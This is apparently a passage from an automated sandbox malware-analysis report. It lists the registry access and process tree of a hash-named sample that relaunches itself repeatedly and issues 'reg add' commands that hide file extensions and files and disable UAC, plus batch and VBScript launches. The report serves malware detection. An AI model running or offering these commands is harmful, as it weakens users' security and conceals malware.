| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cscript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe | N/A |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\nWIcMoMM\teoAYYww.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
"C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe"
C:\Users\Admin\nWIcMoMM\teoAYYww.exe
"C:\Users\Admin\nWIcMoMM\teoAYYww.exe"
C:\ProgramData\UsMEMkgo\KWgYYckw.exe
"C:\ProgramData\UsMEMkgo\KWgYYckw.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vyIoEoIg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOsUcUkQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QCQIsAoo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\faogoAgk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RyUscgwA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcEoIEcU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RoYgIMgU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyocQUEI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GGQwsUQA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MsUwEEsE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MUgwAoQc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rukIIkAU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hqgMcMkw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jucccAww.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DgscUMEk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gggEIsoY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
